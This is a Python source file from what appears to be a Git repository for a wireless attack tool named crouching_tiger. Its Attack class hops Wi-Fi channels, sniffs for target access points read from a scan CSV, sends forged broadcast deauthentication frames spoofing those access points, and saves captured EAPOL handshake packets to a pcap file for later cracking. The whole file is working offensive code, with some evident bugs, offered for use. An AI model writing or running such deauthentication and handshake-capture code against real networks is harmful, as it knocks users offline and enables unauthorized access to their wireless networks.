anoduck/crouching_tiger
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity
crouching_tiger/ctiger/attack.py
anoduck f2c940ae37 feat(Features): 🚧 Hidden Dragon Work 
Many changes performed in development of Hidden Dragon

hdragon command is broken for development
2024-03-12 18:03:38 -04:00

114 lines
4.3 KiB
Python
Raw Permalink Blame History

# Copyright (c) 2024 Anoduck
#
# This software is released under the MIT License.
# https://opensource.org/licenses/MIT
from scapy.sendrecv import AsyncSniffer
from scapy.sendrecv import sendp
from scapy.layers.dot11 import Dot11
from scapy.layers.dot11 import RadioTap
from scapy.layers.dot11 import Dot11Deauth
from scapy.layers.eap import EAPOL
from scapy.utils import PcapWriter
from random import choice
import pandas as pd
from .dataframe import CtigerDataFrame
from time import sleep
import os
import threading
class Attack:
def sniff_stop(self, pkt):
global hndshk_frag
hndshk_frag = 0
pktdmp = PcapWriter('ctiger_handshake.pcap', append=True, sync=True)
pktdmp.write(pkt)
if EAPOL in pkt:
hndshk_frag += 1
else:
hndshk_frag = 0
if hndshk_frag >= 10:
hndshk_frag = 0
return True
def feed_gather(self, mon_dev, targ, lock):
while True:
with lock:
fg_asf = AsyncSniffer(stop_filter=self.sniff_stop,
iface=mon_dev, monitor=True)
self.log.info('Starting pkt gather')
fg_asf.start()
# log.info('Setting mon_dev channel to ', channel)
pkt = RadioTap()/Dot11(type=0, subtype=4,
addr1="ff:ff:ff:ff:ff:ff",
addr2=targ, addr3=targ)/Dot11Deauth()
self.log.debug('sending deauth to ', targ, ' with type 4')
sendp(pkt, iface=mon_dev, verbose=0)
pkt = RadioTap()/Dot11(type=0, subtype=12,
addr1="ff:ff:ff:ff:ff:ff", addr2=targ,
addr3=targ)/Dot11Deauth()
self.log.debug('sending deauth to ', targ, ' with type 12')
sendp(pkt, iface=mon_dev, verbose=0)
def grab_macs(self, pkt):
if pkt.haslayer(Dot11):
if pkt.type == 0 and pkt.subtype == 4:
if pkt.info != '':
self.log.debug('mac: ', pkt.addr2)
return pkt.addr2
def chan_hopper(self, mon_dev, channels, lock):
self.log.info('Channel hopper started.')
chlist = list(set(channels))
chlist.sort()
chlist.remove(',')
chans = [int(chan) for chan in chlist]
while True:
with lock:
ichan = choice(chans)
iw_cmd = 'iw dev ' + mon_dev + ' set channel ' + str(ichan)
os.system(iw_cmd)
self.log.debug('Channel set to ', str(ichan))
sleep(14.7)
# return ichan
def attack(self, mondev, scan_file, net_file, log):
self.log = log
self.mon_dev = mondev
self.scan_file = scan_file
self.net_file = net_file
log.info('Beginning Attack')
targets = pd.read_csv(self.scan_file, index_col=0)
tpairs = targets.drop(columns=['crypt', 'ssid'])
pd_chan_list = tpairs.channel.to_list()
channels = list(set(pd_chan_list))
log.debug('Channel Type: ', str(type(channels)))
pd_bssid_list = tpairs.bssid.to_list()
bssids = list(set(pd_bssid_list))
log.info('Channel list: ', str(channels))
log.info('BSSID list: ', str(bssids))
asniff = AsyncSniffer(iface=self.mon_dev,
prn=self.grab_macs,
monitor=True, store=False)
asniff.start()
log.info('Starting channel hopper')
lock = threading.Lock()
while True:
ch_thread = threading.Thread(target=self.chan_hopper,
name='chopper',
args=(self.mon_dev, channels, lock))
ch_thread.start()
ares = asniff.results
if ares is not None:
for row in ares:
if row[1] in targets:
log.info('Found target: ', row[1])
fg_thread = threading.Thread(
target=self.feed_gather,
name='feeder',
args=(self.mon_dev, row, lock))
fg_thread.start()
Reference in a new issue View git blame Copy permalink